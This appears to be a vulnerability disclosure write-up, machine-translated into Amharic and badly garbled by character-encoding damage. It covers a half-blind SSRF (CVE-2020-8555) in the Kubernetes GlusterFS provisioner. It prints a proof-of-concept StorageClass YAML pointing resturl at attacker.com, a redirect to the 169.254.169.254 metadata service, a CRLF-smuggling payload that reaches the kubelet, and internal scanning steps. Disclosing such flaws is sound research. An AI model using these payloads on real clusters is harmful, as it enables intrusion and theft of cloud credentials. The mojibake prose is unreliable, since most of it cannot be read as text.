ááľáłááť. áľááá: á¨áá
á˝áá á áááá˝ á°áááááąá áĽáá´áľ ááááľ áĽáá°áťá á áááá ááááŤá
áĽá áá áá
áĽá áááą á¨áá¨ááłá á¨á°á áááľ á°ááŤááŞáá˝ á áŠá áááľáľ ááľáĽ á°áááááľá á á፠áŤáá á ááᢠáľáá˝á Brice Augras áĽá Christophe Hauquiert ááᣠááá áá á áĽá ᨠBug Bounty ááľá¨áŽá˝ áá áĽáá°á á°á á°á¨á°áá¸á Reeverzax áĽá Hach áĽááŁááááĄ-
-
áĽáŞáľ á áááŤáľ -Groupe Asten áŠáŁá፠; -
ááŞáľáśá Hauquiert - á¨áŠá áááľáľ á ááá´ááľ á ááŞáŤá˘
áááľá áá á¨ááá?
áá á˝áá á°áŤ á¨áááá ááŽáááľ á áľáááľ á áľáá˝ á áłáá˝ ááááľ ááľáĽ (á˘áŤááľ áá áá) áĽá á á áľá°áłá˝ ááĽáą áĽáá´áľ áĽáá°á°ááá á¨ááááŤá áľ ááááľ ááá˘
áĽáá°ááłáááᣠá¨áłá፠á áłáá˝ áááľ á¨ááłáá áŁá áŞáŤáľ á áá¸ááĄ-
- á áá áĽá á˘áŤ áá áááŤá;
- ááá á°á á˛á°á áá áŤá.
á¨áĽááá ááá˝ á¨á°áá¨á á áá°áááᥠáĽááá áá á áłáá áĽááľ áĽáááááá áĽá áĽáá áá á áᣠáááśá˝á áááĽáá áĽááłááááᢠááá áá á¨áĽááá áá˝áśá˝ á ááą áŁáá°ááá° ááááľ á°á áááá˘
ááááŞáŤ áá áľá ááłá°á ááááŤá¨áľ áĽáááá áá á
á¨áá 11áĄXNUMX áá áááá áááľá¨á á°áááĽá áĽá á áá¤áą á áŁá á¨áá°á á áááł á°ááᢠá áá áĽááľ ááááŤáľ áá á á¨MSRC Bug Bounty ááŽááŤá áá á¨á°áááá áĽá á¨áአááĽáľ ááľáááľá áŤááŁááá˘
áĽá áłáááłáľ/ááŤáśá˝ á ááᣠáĽá áŤáá°á á áá áá¤áłá˝á á Azure Cloud Bug Bounty áłáŞá ááľáĽ á¨áá°á á˝áááśá˝á á áľáááˇá - á¨áŠá áááľáľ á¨á°áá ááá á á°á¨ááŞ!
á áááá ááŽáááłá˝á áá°á¨áľ á¨áŠá áááľáľ á¨áááľ á°á
áááľ áŽáá´ á áłá°á
á áá á á°áťá áá á áľáá°ááá á°áááááľ áá¨áá áá°áŤá¨áľ áĽáááááᢠáááąá áĽáá°ááŤá°áá áĽá á´áááŤá ááááŽá˝á áááὠᨠinfosec áá á á¨á°áĽ á áŁááľ áĽáá°ááŤáአá°áľá áĽáá°áááá!
áłáŞáŤá˝á áĽáá...
ááá°-á˝áá
á¨á°á¨á°á°áá ááá á¨á áá ááá¨áłáľ á ááááŞáŤ áŠá áááľáľ á á°áá á áá°áłá°á á áŤáŁá˘ áĽáá´áľ áĽáá°áá°áŤ áĽáááá¨áľá˘
á áĽáá°áá á áááľ á áŤáŁá˘ ááľáĽ á¨áŠá áááľáľ áááľá°áá á á á˝á áľ á˛áŤá°áá á¨á áľá°áłá°á ááĽááĽá á á°áááś á¨á°áá á á áŤá˘á áááááľ áááĄ
á¨áááŁá áŞáŤá ááĽááĽá á á°áá á á
áŤá˘á ááŞáŤ á¨ááá á˛áá á¨áŠá áááľáľ ááśá˝ á°áá á á°áá áá ááŞáŤ áááá
áĽáŤáá˝á á á°áááá áááá°áĽáŁ á ááľ áá´ á á°áááá á¨ááŤá áá¨ááť ááᣠááá á¨áĽ áĽá ᨠPVC áá áááááá áĽá á áá áááá (á¨ááŤááἠá¨áááŁáá áĽáŤá ᣠáááľá á¨áľáá áĽáŤá)á˘
áľááá
, PVC á¨á°áá ᨠáĽá á K8s áááľá°á ááľáĽ áŤáá á¨áá¨ááť ááá áá á¨á°áŁá á á áá, áľáášá ááá
á¨áĽ á°á¨á᪠áĽááááá˝ á áŠá¤ / á°áá á°ááŁáŁáŞá áľáŤ á áľáŞáŤá
ááá°áłá (áľááááá áľá á áááá áá á¨á°áá°á¨á° áá). (ááľáłááť. áľááááá ááą á¨á°áá á á
áŤá˘áá˝ á¨á á°ááŁá áŠá ááłá á áá áá áľá CCM áá°á áĽáá á˝áááá˘
á áŠá áááľáľ á¨áá°áá á ááŤáł á¨á á
áŤá˘áá˝ á áááśá˝ á áᥠá áĽááááš á ááľáĽ á°áŤáľá°ááá˘
á áĽááłá˝á ááľáĽáŁ á¨áá á áłá˝ á á°ááá¸á á¨ááľáĽ á¨áľáá˝ á á ááŚáľ áá´ áá á á°áŠá¨áááĄ
á áĽáŽ á¨á°á°áŤáá Kubernetes á á
áŤá˘á á áá áá á¨áĽáŤáá˝á á°áááá á á
ááŚáľ
á á áá á áááá áŠá áááľáľ á áá°áłá°á á áŤáŁá˘ ááľáĽ á˛á°áŤá á¨áááŁá áŞáŤá áľáŤ á áľáŞáŤá á¨á°áá á á áŤá˘á áááááľ áá, ááá áá á¨áľáá˝ ááá á áĽáŤá (á¨áá áŁáá áĽááá ááá፠áá ááĽá 3) á¨á°áá á á áŤá˘áá ááľáŁá á ááłá¨áá¨áĽ áá°áá. áĽá áááŽá˝ á áŁá á¨ááľáĄá áľ áá áá!
á¨á áá áááł
á áá ááá á¨áá á¨á°á áá°áá á¨áľáŤ áá°áľ áĽáá´áľ áĽáá°á ááá áĽá á¨á°áá á áááááľ á á áŤá˘áá á¨ááľáĽ ááĽá áľ áĽáá´áľ áĽáá°á°á¨áľá áĽááĽáŤáŤááᢠáĽáá° ááľáŁá ááľááááśá˝á ááááľ ááá áአááĽáśá˝á á¨ááłá°á á ááłááľ áľáááśá˝á áĽáá´áľ áá¨ááá áĽáá°áá˝á áŤáłáááłáá˘
á ááľ ááá ááá áá á (á áá ááłá ááᣠá¨á áááááľ áá áĽáŤá ááááŞ) á¨á°áá áá á áŤáŁá˘ á áá á áá°áłá°á K8s áľá áá°á°ááŤáŠ á¨á áááááľ á á áŤá˘áá˝ áľáĽáľáŚá˝ ááááŁáľ á¨áľáˇáá˘
á ááááŤá˝á á GlusterFS á á áŤá˘á áá á á°áŠá¨á áá áᢠááá áĽááłá á¨á°á¨á᪠á¨áĽááááá˝ á á°á á°á¨á°á á áá á ááľ ááľáĽ á˘ááá˝á, Quobyte, StorageOS áĽá ScaleIO áá°ááłáłá á°áááááľ á¨á°ááᥠáá¸á.
á°áááá á¨áľáá˝ á á
ááŚáľ áá´á á áááŁáĽ áá áá
á áá¨ááť ááá áľáá°á áá
áľ áááľá°áá¤áá¤áľ á áááá á°áá á ááá áŽáľ áĽá resturl
áłááá /volumes
.
áá
áá á°á¨á᪠ááááľ á áá¨á áááľáááľ ááľááá #
á áááŞáŤ resturl
. á¨áá ááá áľáá á¨SSRF á°áááááľá áááá°á˝ á¨á°á áááá á¨ááááŞáŤá ᨠYAML áá
á áá¸ááᢠ(áľá á¨áá ááá áľáá ááá á¨áá ááá SSRF á¨á áá ááá ἠáľá˝ááá
ᣠáááłááŁ
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrf
á¨ááŤá á¨áŠá áááľáľ áááľá°áá á áááľ áááľá°áłá°á áááľáŽá˝ á°á áááᢠkubectl. á á°áááśáŁ á¨á°áá á á áŤá˘áá˝ (AzureᣠGoogleᣠAWSᣠááá°.) á áá áááá፠ááľáĽ ááá áá ááľááááśá˝á áĽáá˛áŤáá áŤáľá˝áááłáá˘
ááá á ááľáá áááŁáá á¨áĽáá "ááŠ" ááá áá áá á˝áŤáá. á¨áŠá¤-á°ááŁáŁáŞ-á áľá°áłáłáŞ á¨á¤á˝á˛á˛á áĽáŤáá áá˝áááĄ-
kubectl create -f sc-poc.yaml
áááą á¨á áĽáá áĽááł
á¨áá
á áá áĽáá áłáááᣠá¨áááá á áááá á¨á¤á˝á˛á˛á ááá˝ ááááľ á˝ááá - á áľáĽááá˝ describe pvc
ááá get events
á kubectl. áĽá á áĽáááĽáĄ áá
ááŁáŞ á¨áŠá áááľáľ ážáá á ááľá ááááŤááš/á¨áľá
á°áľ áááĽááśáš ááľáĽ á áŁá áááśá˝ áá¸áá˘
á ááá áŤáá ááłá áĽáá
á áᢠhttps://www.google.fr
áĽáá° áááŞáŤ áŤááá resturl
:
kubectl describe pvc poc-ssrf
# иНи Мо ПОМоŃĐľ вОŃпОНŃСОваŃŃŃŃ kubectl get events
á áá
á ááŤá¨áĽáŁ á ááłá°ááľ áĽáŤááá˝ áĽáť á°ááľáááᢠHTTP POST áĽá á¨ááááť áŽáľ á¨áá á¨ááášá á áŤá áááľ ááááľ á ááťáá 201. áľááá
ᣠá°á¨á᪠áááá áááľá¨á ááľáá áĽá áá
áá á¨á áá áááł á á á˛áľ á ááŤá¨áŚá˝ á áľááá°ááá˘
á¨á áááá áááá° áááĽ
- á¨áá áááł #1ᥠá¨á᪠á áááá 302 áááááá á áá áá á¨á¤á˝á˛á˛á áá´á áááá¨á á¨á áá á°áááá á¨ááľáĽ áááĽá ááá°áĽá°áĽá˘
- á¨áá áááł #2ᥠᨠLAN á ááľ áĽá á¨ááľáĽ ááĽáľ áááľá á áŤáľ á°áá˘
- á¨áá áááł #3ᥠá¨á°á á á¨á¤á˝á˛á˛á áĽáŤááá˝á áááá á áĽá á¨áŠá¤-á°ááŁáŁáŞ áááἠááľáłááťáá˝ á¨ááŁáá ááἠááááŁáľ HTTP CRLF + áááááá ("áŽááľáŽáŁááľ á áá ") á áá ááá˘
á´áááŤá ááááŽá˝
- áĽááą Azure Kubernetes Service (AKS) ᨠKubernetes áľáŞáľ 1.12 áá á á°áá á ááŽá ááá á°á á ááá˘
- á¨áá á¨á°ááášáľ áááłáá˝ á¨á°áá¸ááľ á¨áŚáľá°áá áááł á áľá°áá á Kubernetes á¨á áἠáá áĽáľáá˝ áá ááᣠááááŤáąá á¨áááá áľáŞáľ ⤠1.12 áá á áĽáŽ á¨á°á°áŤ áŠá áááľáľ áŤáľáááááá˘
- á¨á áĽá ááŤá á áááá -
https://attacker.com
.
á¨áá áááł #1ᥠá¨á¤á˝á˛á˛á POST áĽáŤáá áá° GET á á áŁáŤ ááá¨á áĽá ááľáĽáŤáááľ áŤáá áá¨á ááá á
áááááľ á¨ááááŞáŤá áá´ á á áĽáá á áááá áá á á°áťá˝ááᢠ302 HTTP Retcodeá¨POST áĽáŤáá áá° GET áĽáŤá áááá¨á (á áĽááá ááááŤá ááľáĽ á°á¨á 4)
á¨ááááŞáŤ áĽáŤá (3) á¨á°áá áá á¨ááᣠáááľá°áá¤áá¤áľ (á°ááŁáŁáŞ á áľá°áłáłáŞ)ᣠá¨POST á áááľ á ááᢠáĽááá
á á°á¨ááá˝ á áá¨á°á áá° GET ááááá á á˝ááááĄ
- áĽáá° áááŞáŤ
resturl
á StorageClass ááľáĽ á°á áááhttp://attacker.com/redirect.php
. - á¨áá¨á¨áť ááĽáĽ
https://attacker.com/redirect.php
á áá¨á°áá á¨á áŤáŁá˘ áŤáľá á 302 HTTP áááł áŽáľ ááá˝ áá°áŁááĄ-http://169.254.169.254
. áá áá ááááá á¨ááľáĽ ááĽáľ ááá áá˝áá - á áá ááłá áá á¨áááŞáŤ áááá áĽáá° ááłá áĽáť áĽá á áá áááá. - á ááŁáŞ net/http á¤á° ááťáááľ áááá áĽáŤááá á ááá POSTá áá° GET ᨠ302 áááł áŽáľ á ááá¨á á¨á¤á˝á˛á˛á GET áĽáŤáá áá° áááá ááĽá áľ á áľá¨áľááá˘
á¨á¤á˝á˛á˛á ááá˝ á áŤáá áááá ἠááľá¨á áŤáľáááááłá describe
ᨠPVC ááá;
kubectl describe pvc xxx
á JSON á áá¸áľ áááá áá á¨áťááá á¨á¤á˝á˛á˛á ááá˝ ááłá áá¸áááĄ
á áá¨á°ááľ ááĽáŚá˝ ááááŤáľ á áá
áą á¨á°ááá á¨á°áááááľ á á
á ááľá áá áá˘
- á¨á¤á˝á˛á˛á áŤáľááá˝á áá° á᪠áĽáŤá ááľááŁáľ á áááťáá˘
- á á°áááľ ááľáĽ áŤá áááŞáŤáá˝ áá á¨POST áĽáŤáá áá¨ááá á áááťá (áá á ááś áŤáá ááá°d ááłá ááá áĽá´áąá ááá á¨á ááš áá) 2379 áŤáá°áá°á ᨠHTTP áĽá á áá á¨áá áá°áĽ).
- á¨áááł áŽáľ 200 á˛áá áĽá áááš á¨JSON áááľ á áááľ áłááá¨á á¨ááá˝ á áŤá áááľá áááŁáľ á áááťáá˘
á¨áá áááł #2ᥠá¨á áŤáŁá˘ á ááłá¨ áá¨áĽá ááááľ
áá á¨ááá˝ ááá áľáá á¨á¤áľ.á¤áľ.á á.á¤á áá´ á ááá á á¨á°áá á á áŤá˘áá á¨ááľáĽ á ááłá¨ áá¨áĽ áááááľ áĽá á¨á°ááŤáŠ á¨ááłáἠá áááááśá˝á (ááłáłáł áááłá áŠá¤ááľáŁ ááá°. ááá°.) á á°áĄáľ ááážá˝ áá°á¨áľ áááááľ áĽá á áá áááᢠá¨áŠá¤ áááŁá áŞáŤ.
á ááááŞáŤ á¨áŠá áááľáľ á áŤááľ áá°á á á¨ááľááľ á˝ááł áá°áŚá˝ á°ááľááá (8443 ᣠ10250 ᣠ10251 ᣠááá°) áĽá á¨á፠á¨áá°áť áá°áąá á áŤáľ-á°á ááľá¨á á ááĽáá˘
áá á¨ááááľ áá´ á áŁá á¨á°áᨠáĽá á¨áĽááłá áľáŤááŽá˝ áĽá SSRF ááłáŞáŤáá˝ áá á¨áááŁáŁá áááá á áááá¨áľáŁ á á ááá áá°áąá á áŤáľ á°á á ááŤá°áŤ á¨áŤáłá˝áá á°áŤá°áá˝ á áŁá˝ áľááŞááľ áááá á áá°ááá˘
áááłá á¨ááľáŁá ááľáááá 172.16.0.0/12 á ááĽááľ áááááľ 15 á°áŤá°áá˝ á áľáአá°ááá¨ááᢠá¨áá áŤáá á¨á áá ááá áĽáá° ááłá áĽáť á°ááá§á áĽá áá° áĽááľá áአá áááááľ á á áŤá˘ IP ááá ááá¨á áá˝ááá˘
á ááľ á¨á áá á áľáŤáť áĽá á ááľ áá°áĽ áááááľ á¨áá¨á°ááľá ááľá¨á á ááĽááľ:
- á¨áá¨á¨áťáá á¨á°á¨ááá á¨áá¨ááť ááá áá°á¨á;
- ááłááá á¨á°á¨ááá á¨áá áá á á¨áááŁáá áĽáŤáá áŤáľáááą;
- á¨á áá áĽá á¨áááľ áááá˝á ááááŠ
sc.yaml
; - á á˛áľ á áá áĽá áá°áĽ áŤáá á¨áá¨ááť ááá ááá á;
- á á˛áľ PVC ááá áŠ;
- á PVC áááá á áá áá á¨áá°áť áá¤áśá˝á áŤááĄá˘
á¨áá áááł #3ᥠᨠCRLF ááá + á ááἠá¤á˝á˛á˛á á âá áŽáâ á¨áŠá áááľáľ áááľá°á áľáŞáśá˝
á¨áá á á°á¨á᪠á á áŤá˘á áá°áá áá˝ á¨áአá¨K8s áááľá°á áľáŞáśá˝á á á áá§á и á¨áŠá¤-á°ááŁáŁáŞ-á áľá°áłáłáŞ áááἠááľáłááťáá˝á ááłá¨áť á°áŁá¸áᣠáá¤áąá á¨á áá ááá ááá˘
áá á¨á¤á˝á˛á˛á ááá˝ áááááľ á¨á°áá°ááľá á¨á¤á˝á˛á˛á áĽáŤááá˝á ááááἠá áĽáá á áŤáą ááááľ á¨á áá ááš ááá˘
á¨áá¨á¨áťáá áááł á°ááŁáŤá áááľá¨á á¨áá¨á°ááľ áááłáá˝ ááááľ áá á¨áŁá¸áá˘
- á°á ááá á¨áŠá¤-á°ááŁáŁáŞ-á áľá°áłáłáŞ áááἠááľáłááťáá˝á ááľá¨áľ á áá áľ (áááłá á Azure LogInsights)á˘
- á¨áŠá áááľáľ áááľá°á á¨1.12 á áłá˝ á¨áá á¨áááá áľáŞáľ áá áá á áá áľá˘
á GlusterFS Go á°áá á áĽá á áá¸áľ á˘áá á áááá ááŤá¨á áááááľá á¨ááŤáľááľá á áŤáŁá˘áŤá á áŤáŁá˘ á á°ááá°áá (PoC á áá áá á¨áá°á áĽááá áŁááá˘)
á°áááˇá
á¨áá á¨á°ááááá ááá˝-ááá áľáá SSRF á ááŁáá вПоŃŃĐľ á¨áá ááᣠáŤáľááá˝áᣠHTTP áá´áᣠáááŞáŤáá˝á áĽá áłáłáá˝á á áá°áŤáľ áŠá¤-á°ááŁáŁáŞ-á áľá°áłáłáŞá á¨áᎠáá° áááŤá˝á áĽáŤááá˝á ááá á˝áááá˘
á áááŞáŤ ááľáĽ á¨áá°áŤ âááĽááâ ááłá áĽáá
á áᢠresturl
á°ááłáłá á¨áĽááľ áááłá á°ááŁáŤá á¨ááŤá°áá áá¨ááť ááááĄ
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn
áá¤áą áľá á°áľ áá áŤáá°ááá ááá˝, á áááŁá áŞáŤ áááἠááľáłááťáá˝ ááľáĽ áľáá°áááá á áááĽááľ. á ááŁáŞááľ ááá áá ááľáá áááŁáá á¨á¤á˝á˛á˛á ááá˝ áááĽááľ áááśá˝ áĽááŤá á°ááá ááá˘
áá
á á
áá°-ááłáĽ áá¨áá፠áááá ááľáĽ á¨áĽá á áŁá áá¤áłá âááĽááâ áá áá˘
áá áá á áŤááľ á áá ááᣠá á°ááŤáŠ á¨áá°áłá°á k8s á á áŤá˘áá˝ áľáĽáľáŚá˝ áá á¨áá¨á°ááľ áĽááśá˝ áĽááśášá ááá¸á á˝áááᥠáአááĽáśá˝á á ááłáłáł ááłáŽá˝ áá ááľááááśá˝á ááłá°áᣠMaster DoS á (áŤááá°á á¨) HTTP á etcd áá á ááŁááá˝ áá ááá°.
áá¤áśá˝
áŤááááá á¨á¤áľá¤áľá áá¤á á°áááááľ á á°ááá¨á° á áŠá áááľáľ ááá ááá፠á°á¨á á°á°áĽáśáłáᢠá˛áŞá¤áľá¤áľ 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. ᨠKubernetes ááŞááľá áá á¨á°ááááá á°áááááľ áĽáť á¨áááľ ááľáĽ áŤáľááŁá, á¨á áá áŹáá°á (á˘áá´ááŞá˛ áŹáá°á) áĽáá° áĽá áŤá°áááá á ááľá.
ááá ááᣠá¨á°ááá ᨠá¨á áááááľ á áŤáŁá˘ á ááá ááŤáľá¨áľá á¨áá˝ááľá áááá˝ ááááá (áĽá áá á¨á ááááŽá˝ á áŁá á áľá°áłá˝ ááá áá á!) á°áááááąá áĽáá°áá áá° á°á¨á áĽááľááá á ááłáłáᢠááłá CVSS10/10 ááĽá á á¨áááŽá˝.
á á°áá á áŤáŁá˘áá˝ áá áá°ááą á¨áá˝ááľá á°á áááá˝ á˛áááá á¨áá áááľ áĽááľáľá¨áą á¨ááŤááá á°á¨á᪠áá¨á á¨áá á áłá˝ á áá˘
á˝áááľ
- á¨á°áá á¨ááľáĽ ááľááááśá˝á á áá áá áľáááá˝á á áááľ áŤáľáá˝áá˘
- á¨áá áŤááá áááł á IDOR (á°á áááą áŤáá°á á á ááĽá°á ááá ááŁááť) áá´á á¨ááá˝ á¨á áŤáŁá˘ á ááłá¨ áá¨áŚá˝ áá á ááŁááľ ááá˘
ááľá˘áŤáááľ
- á¨áĽááľ á áááľ
á¨ááᨠáĽáá áľáá´ áá°áá ááľááááśá˝ áľáááľ ááľáá áááŁá (áááłá ááłáłáł á¤áá á)ᢠ- á¨á áŤáŁá˘áŤá á ááłá¨ áá¨áĽá á ááááľ áá¨áá áá°áĽá°áĽ (á¨á¤áľá¤áľá¤á˝ áľáŞáľ ᣠá¨á¤á˝á˛á˛á á áááá áľáŞáľ ᣠ...)á˘
- áĽáá° ááłáłáł á¤áá á áŤá á¨ááľáĽ á¤áá ááá˝á á ááá¨áĽ á¨á áĽááľ áĽá á¨áá á¨á° áááľ áá¨áá áá°áĽáľáĄ (
http://169.254.169.254
áŁâŚ) - á¨á°áá ááľááááśá˝á á áá áá á¨á°áá á ááἠááľá¨á á˘
ááááľ
á¨áĽááľ áŹáá°áŽá˝ áá á¨á°áŤáŤá ááá áááłáá˝ áá ááĽáá áłááááľáŁ áá áĽá áľáááśá˝ áĽá á áá ááá áá˝áá áĽá á¨á°áá áá ááŞááľá (ááá áá ááááá) á¨áááá á¨áá áá° áá ááłááá˝ áá፠áá˝ááá˘
á áá°áłá°á á¨K8s á áŤáŁá˘ ááľáĽ áľááá áá áĽá á á áá áá áŤááá á°á˝áĽá áĽá¨ááááá á á°ááááľ áá á°á˝áá ááŤáłáá á¨áá˝á áĽá áááłáá˝á ááááľ áĽáá˝áááᢠá°á¨á᪠ááłááὠᨠetcd áłáłá¤á áá áá¸áľ ááá áá° Kubernetes API ááłá áĽáŞ ááľá¨áá áŤáŤáľáłáá˘
á¨áá ááľáá
- á˛á´áá á 6ᣠ2019ᥠá°áááááľ áMSRC Bug Bounty áŞáááľ á°á°áááá˘
- ááá᪠3ᣠ2020áĄ- á áśáľá°á ááá ááŠá áááľáľ ááá˘áá˝ á á°á áááľ ááłá áá áĽá¨á°áŤá áááá á áłááᢠáĽá SSRF áĽáá° ááľáŁá (ááľá -áŽá) á°áááááľ áĽáá˛ááĽáŠ á áááᢠá¨ááŤá á¨á˝ááŠá ááá á á°ááá¨á° á´áááŤá ááááŽá˝á á¨áŤá á á ááá ááᣠá á áá ááá˘
- áĽ.á¤.á .
- ááá᪠15ᣠ2020ᥠá¨áŠá áááľáľ ááá˘áá˝ ááá˝ ááá áľáá SSRF + CRLF ááá ááááľ áááśá˝ áĽáá° ááľá -á á°á á°áááááľ áĽáá°ááá á á áłáááááᢠáá˛áŤáá á¨ááá˝ á áááááľ á á áŤá˘áá˝á ááŞáŤ áá°áá°á á áááᥠá¨K8s áĄáľá á áá á¨ááá áááľá¤ áá áĽá¨á°ááá áá áá˘
- ááá᪠15ᣠ2020ᥠá¨MSRC á˝áááľ á HackerOne á áŠá á°ááĽááá˘
- ááá᪠16ᣠ2020ᥠáŠá áááľáľ áá¤áľá˛ (á¨áááľ á°á áááľ áŽáá´) á°áááááąá á áá áĽáľá¨ ááá˘áľ á ááá˝ áľá¨áľ á°áá ááá á¨áá˝á á ááŤáł ááĽá áľááá¸á ááľá˘áŠá áĽáá˛áá á áááá˘
- ááĽáŠá᪠11ᣠ2020ᥠá¨Google áŞá áá á˝áááľ á°ááĽááá˘
- ááá˝ 4ᣠ2020ᥠá¨áŠá áááľáľ á˝áááľ á HackerOne á áŠá á°ááĽááá˘
- ááá˝ 15ᣠ2020ᥠá áŽáŞáľ-19 áááł á ááááŞáŤ áááááĽá á¨á°áŤáááľ á ááŁá ááá፠ááá áá á°ááááá˘
- á°á 1ᣠ2020ᥠáŠá áááľáľ + ááááŽáśááľ áľá á°áááááą á¨á፠ááááŤá˘
TL; DR
- á˘áŤ á áĽá°á áá áĽáá ááá :)
- ááá áĽááłá áááľá¨á ááá ááááľ áŁááá¨áá á áŠá áááľáľ ááľáĽ á¨ááľá -á á°á á°áááááľá á ááá°ááá˘
- á á°ááŤáŠ á¨á°áá á á áŤá˘áá˝ áľáĽáľáŚá˝ áá á°á¨á᪠áľááłááá˝á á áľáááá áĽá á°á¨á᪠á áľá°áá áááťáá˝á áááááľ á á°áááááľ á¨áá°áá°áá ááłáľ ááłá°á á˝áááá˘
- á áá
á˝áá ááľáĽ áĽá á´áááŤá ááááŽá˝á áŤááá. á¨áĽááľá áá áĽáááŤá á°áľá°áá˝ áá (áľáá°ááĄ-
@ReeverZax &@__hach_ ). - ááá ááááľ ááááá˛áá˝ áĽá áááŁáá˝ á¨á°á á áá á áá áĽá áá áĽáá°áá°áą áłááá˘
ááŁááťáá˝
-
Google áĄáľá kubernetes-á°á áááľ-ááľáłáá፠; -
CVE-2020-8555 ; -
á¨áááá áĽáľá # 30794 ; -
heketi/á°áá á/api/go-client/volume.go .
PS á¨á°ááá
á áĽááá˝á áá áŤááĽáĄáĄ-
- ÂŤ
á¨áŠá áááľáľ áłá፠á á°á á áá á°á¨ááˇáᢠ"; - ÂŤ
ááááŚá˝á á ááŤá á áŠá áááľáľ ááľáĽ á ááľ ááľ áááŁáľ "; - ÂŤ
33+ Kubernetes á¨á°á áááľ ááłáŞáŤáá˝ Âť.
ááá: hab.com